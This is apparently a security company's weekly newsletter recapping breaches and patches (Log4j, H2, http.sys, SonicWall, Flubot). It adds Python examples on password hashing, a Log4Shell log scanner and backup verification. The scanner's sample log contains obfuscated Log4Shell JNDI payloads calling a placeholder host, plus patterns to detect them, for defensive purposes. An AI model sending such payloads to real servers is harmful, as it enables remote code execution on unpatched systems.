Welcome to #WakeUpWednesday. We want to make the Netherlands digitally safe and resilient. That is why Tesorion now publishes a short overview every Wednesday of vulnerabilities and hacks that have received national or international attention. We want to wake up as many people as possible and make them aware of the risks in the field of cyber security.
We will of course continue to report directly on important vulnerabilities and the options to mitigate them; #WakeUpWednesday is a retrospective.
Data is valuable, also to cyber criminals, and no organization is spared, as the hack on the Red Cross shows: data on more than 500,000 people, many of them vulnerable, was stolen.
In addition, cyber criminals have managed to abuse more than 2,000 corporate email accounts in several spyware campaigns. Kaspersky's investigation shows that the spyware was distributed as an email attachment. If an employee opens the attachment and the spyware infects the system, the employee's username and password are sent to the attacker, who then uses the stolen credentials to get into the account and send the spyware on to the employee's contacts, so that every compromised mailbox becomes the launch pad for the next round. Mail from a known colleague or business partner is therefore no guarantee that an attachment is safe.
Exploitation of known vulnerabilities long after a patch is available is nothing new. In early December we warned about critical vulnerabilities in the SonicWall SMA 100 series; this week a warning followed that these vulnerabilities are now being actively exploited. There is no workaround, so the advice is to install the updated firmware as soon as possible.
Logging is important, for example to find out how cyber criminals got in. Nevertheless, Cisco's research shows that in most incidents the attack vector remains unknown because of a lack of logging. Where the vector is known, the cause is in most cases phishing or an application exposed to the internet. Train the cyber awareness of your employees, fix vulnerabilities as soon as an update is available, and make sure that the logs of internet-facing systems, authentication and endpoints are collected centrally and retained long enough to still be available when an incident is investigated.
In #WakeUpWednesday we regularly report incidents that show the need and urgency of patching, as well as incidents where more awareness would have helped.
Over the past week the Apache Software Foundation, which among other projects manages Apache Log4j, OpenOffice and the Apache HTTP Server, warned against the use of end-of-life software: users are still being attacked through old vulnerabilities in Apache software that is no longer supported or maintained, and for which no fix will ever be released.
Updates have also been released for cryptsetup, the software behind LUKS disk encryption on Linux. The vulnerability (CVE-2021-4122) does not bypass the passphrase itself: an attacker with physical access to the medium could manipulate the LUKS2 header so that, the next time the legitimate owner unlocked the device with the correct passphrase, cryptsetup would silently decrypt part of the device in place, leaving that data permanently unencrypted. Keeping a backup of the LUKS header (cryptsetup luksHeaderBackup), storing it where it cannot be altered, and comparing it with the on-disk header after the device has been out of your control is a cheap way to detect such tampering; making backups that cannot be changed afterwards is, more generally, one of the basic measures within cyber security.
Due to the combination of a weak administrator password and the storage of user passwords as unsalted MD5 hashes, the private data of nearly 7 million users of the Open Subtitles website has been stolen and published. The email addresses have been added to the data-leak search engine Have I Been Pwned. Unsalted MD5 hashes can be reversed in bulk with precomputed tables, so affected users should treat their passwords as known and change them wherever they were reused.
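To show why unsalted MD5 is the weak link in a breach like this, here is an added example (written for this overview, not code from Open Subtitles or from Tesorion) that stores the same constructed sample passwords once with unsalted MD5 and once with salted PBKDF2-HMAC-SHA256, then runs the attacker's lookup attack against both. The account names, the passwords and the wordlist are constructed; the storage format for the PBKDF2 records is this example's own.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed sample accounts for the demonstration; two users share a password.
SAMPLE_PASSWORDS = {
    "alice": "Summer2021!",
    "bob": "Summer2021!",
    "carol": "correct horse battery staple",
}

# Constructed attacker wordlist (a real one holds billions of entries).
WORDLIST = ["123456", "password", "Summer2021!", "qwerty"]


def weak_hash(password: str) -> str:
    """Unsalted MD5: identical passwords give identical digests, and every
    digest can be reversed with one precomputed lookup table."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def strong_hash(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt per record.
    Storage format 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>' is this example's own."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join(["pbkdf2_sha256", str(iterations), salt.hex(), digest.hex()])


def verify_strong(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError("unsupported hash scheme: " + scheme)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def crack_weak(stored_md5: str, wordlist) -> Optional[str]:
    """Offline guess: one MD5 per candidate, and the same table of candidate
    digests answers for every user in the leaked database at once."""
    table = {weak_hash(w): w for w in wordlist}
    return table.get(stored_md5)


def compare_schemes() -> dict:
    """Summarise what each scheme leaks for the sample accounts."""
    weak = {u: weak_hash(p) for u, p in SAMPLE_PASSWORDS.items()}
    strong = {u: strong_hash(p) for u, p in SAMPLE_PASSWORDS.items()}
    return {
        "weak_alice_equals_bob": weak["alice"] == weak["bob"],
        "strong_alice_equals_bob": strong["alice"] == strong["bob"],
        "weak_cracked": {u: crack_weak(h, WORDLIST) for u, h in weak.items()},
        "strong_verifies": all(verify_strong(SAMPLE_PASSWORDS[u], h) for u, h in strong.items()),
    }


if __name__ == "__main__":
    print(compare_schemes())
```

With the weak scheme the shared password shows up as two identical digests and one wordlist hit breaks both accounts; with a per-record salt the same two passwords produce different records, the wordlist table is useless, and the work factor has to be paid again for every single guess against every single user.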
The Log4j vulnerability affects many products. The British health service (NHS Digital), for instance, warns of attacks on VMware Horizon through the vulnerability: Horizon bundles Apache Tomcat, which in turn uses Log4j. Although VMware released patches in December, attackers are actively scanning for systems that do not yet have them. Check your own logs for lookup strings such as ${jndi:ldap://...} in request paths, headers and user agents; attackers vary the encoding and nesting of these strings, so a search for the literal text alone is not enough.
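The following added example (written for this overview; it is not code from VMware, NHS Digital or Tesorion) scans web-server access logs for Log4Shell attempts. It URL-decodes each line, collapses the Log4j 2 lookup forms that attackers use to hide the word jndi (${lower:...}, ${upper:...} and the ${key:-default} fallback, as in ${::-j}), and only then looks for ${jndi:. The log lines and the IP addresses in them are constructed for the demonstration.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Innermost lookup only: a ${...} that contains no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalisation the dangerous pattern is simply "${jndi:<scheme>://<host>".
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/:}\s]+)", re.IGNORECASE)

# Constructed access-log lines (combined log format) for the demonstration.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Jan/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Jan/2022:10:01:05 +0000] "GET / HTTP/1.1" 200 1234 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [11/Jan/2022:10:01:07 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/obj} HTTP/1.1" 404 512 "-" "curl/7.68"',
    '203.0.113.9 - - [11/Jan/2022:10:01:09 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 512 "-" "-"',
    '203.0.113.5 - - [11/Jan/2022:10:01:11 +0000] "GET /?q=${date:yyyy}%20report HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
]


def _resolve(inner: str) -> Optional[str]:
    """Evaluate the Log4j 2 lookup forms attackers use to hide 'jndi'.
    Returns None for a lookup we cannot (and do not want to) evaluate."""
    if ":-" in inner:                      # ${key:-default} -> default, e.g. ${::-j}, ${env:NOPE:-j}
        return inner.split(":-", 1)[1]
    prefix, sep, arg = inner.partition(":")
    if sep:
        if prefix.lower() == "lower":
            return arg.lower()
        if prefix.lower() == "upper":
            return arg.upper()
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode (repeatedly, for double encoding) and collapse nested lookups
    from the inside out until nothing more can be simplified."""
    decoded = unquote(text)
    while decoded != text:
        text, decoded = decoded, unquote(decoded)
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            out = _resolve(match.group(1))
            if out is None:
                return match.group(0)
            changed = True
            return out

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def find_jndi_target(line: str) -> Optional[Tuple[str, str]]:
    """(scheme, host) of the callback server the lookup would contact, or None."""
    m = JNDI_LOOKUP.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """1-based line numbers and callback targets of all Log4Shell attempts."""
    hits = []
    for n, line in enumerate(lines, 1):
        target = find_jndi_target(line)
        if target:
            hits.append((n, target[0], target[1]))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d: %s lookup to %s" % hit)
```

A hit in the access log only proves an attempt, not a successful exploit; the callback host it extracts is what to look for in outbound DNS and connection logs from the affected server to decide which it was. The benign ${date:yyyy} line is left alone because the normaliser only rewrites the lookup types it knows.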
A new vulnerability has been discovered in the H2 database console (CVE-2021-42392). Its root cause is the same as Log4Shell's: user input, here the JDBC URL that the web console accepts, reaches a JNDI lookup, which can load classes from an attacker-controlled server and execute code. Because the H2 engine is embedded in many Java applications, the reach is large, although the console listens only on the local machine by default, so the risk is greatest where it has been deliberately exposed. Affected are H2 versions 1.1.100 to 2.0.204; the advice is to update to version 2.0.206 as soon as possible and to keep the console switched off in production.
During January's Patch Tuesday, Microsoft released patches for 96 new vulnerabilities. The most severe is a remote code execution vulnerability in the HTTP protocol stack (http.sys), registered as CVE-2022-21907, which lets an unauthenticated attacker execute code on an affected system by sending specially crafted packets, without any user interaction. On Windows Server 2019 and Windows 10 version 1809 the vulnerable HTTP trailer support is inactive unless the registry value EnableTrailerSupport under HKLM\System\CurrentControlSet\Services\HTTP\Parameters has been set; other affected versions have no such workaround. Check whether your products are listed and apply the patches, or the workaround where it applies, as soon as possible.
It is no surprise that cyber criminals keep looking for new ways into organizations. Currently, for example, USB sticks are being sent by post in packaging that closely resembles that of reputable organizations; the sticks are prepared to run malware as soon as they are plugged in. Unsolicited removable media should never be connected to a work system, and a device policy that blocks unknown USB devices takes that decision out of the individual employee's hands.
The makers of Flubot, an Android trojan that targets financial data, have launched a number of new campaigns to spread their malware. Be alert to messages about, for example, updating Adobe Flash Player, fake software-update notifications that lead outside the Google Play Store, or parcel deliveries. The most characteristic feature is that the link in these messages does not lead to a domain belonging to the organization it claims to come from.
The new year also started with security updates. Google has released an update for Chrome that, among other things, fixes a critical vulnerability that could allow an attacker to execute arbitrary code on a user's system without further user action. Code execution lets an attacker install malware that can, for example, steal credit-card and login details. Note that Chrome only runs the new version after the browser has been restarted.
Cyber criminals carried out a supply-chain attack on more than 100 companies by adding skimmer code to the video player of a cloud video hosting service. Every website that embedded the player automatically loaded the malicious code as well, so the site was infected and credit-card data entered by visitors could be stolen. Third-party scripts run with the same privileges as your own code on the page: keep an inventory of them, restrict them with a Content Security Policy, and monitor for unexpected changes.
Cyber security has many aspects; one of the basic measures is creating backups and being able to restore them. Defining a backup strategy is therefore part of a business continuity plan. Make sure you know how long your organization, or part of it, may be unavailable (Recovery Time Objective) and how much data loss is acceptable (Recovery Point Objective), and test the restore process regularly to avoid unpleasant surprises. In December, for example, Kyoto University lost 77TB of research data because of an error in its backup system.
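A backup that was never verified is only an assumption, which is the lesson of the Kyoto case. The added example below (written for this overview; it is not code from Kyoto University or Tesorion) records a SHA-256 manifest of a backup set at backup time and later checks a restored or still-stored copy against it, reporting files that are missing, altered or unexpected. The directory tree, its contents and the simulated fault (a later backup run that truncates one file and deletes another) are constructed for the demonstration.

```python
import hashlib
import json
import shutil
import tempfile
from pathlib import Path
from typing import Dict


def build_manifest(root: Path) -> Dict[str, str]:
    """Relative POSIX path -> SHA-256 of content, for every regular file under root."""
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            manifest[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def verify_restore(restored: Path, manifest: Dict[str, str]) -> dict:
    """Compare a restored (or still-stored) backup set against the manifest
    recorded when the backup was taken."""
    current = build_manifest(restored)
    missing = sorted(set(manifest) - set(current))
    modified = sorted(k for k in manifest if k in current and current[k] != manifest[k])
    unexpected = sorted(set(current) - set(manifest))
    return {"ok": not missing and not modified, "missing": missing,
            "modified": modified, "unexpected": unexpected}


def run_demo() -> dict:
    """Constructed scenario: back up a small tree, record the manifest, then
    simulate a faulty backup job that truncates one file and deletes another."""
    with tempfile.TemporaryDirectory() as tmp:
        source = Path(tmp) / "source"
        (source / "data").mkdir(parents=True)
        (source / "logs").mkdir()
        (source / "data" / "results.csv").write_text("run,score\n1,0.91\n2,0.93\n")
        (source / "logs" / "run1.txt").write_text("ok\n")
        (source / "logs" / "run2.txt").write_text("ok\n")

        backup = Path(tmp) / "backup"
        shutil.copytree(source, backup)

        # The manifest belongs somewhere the backup job itself cannot overwrite it.
        manifest_file = Path(tmp) / "manifest.json"
        manifest_file.write_text(json.dumps(build_manifest(backup), indent=2))
        manifest = json.loads(manifest_file.read_text())
        clean = verify_restore(backup, manifest)

        # Simulated fault in the next backup run.
        (backup / "data" / "results.csv").write_text("run,score\n")
        (backup / "logs" / "run2.txt").unlink()
        (backup / "logs" / "stray.tmp").write_text("")
        after_fault = verify_restore(backup, manifest)

    return {"clean": clean, "after_fault": after_fault}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The manifest is what makes the "cannot be changed afterwards" requirement testable: it has to live outside the reach of the backup job (write-once storage, a separate account), and the check should run against an actual restore to scratch storage, which is also the moment to measure whether the restore fits within the Recovery Time Objective.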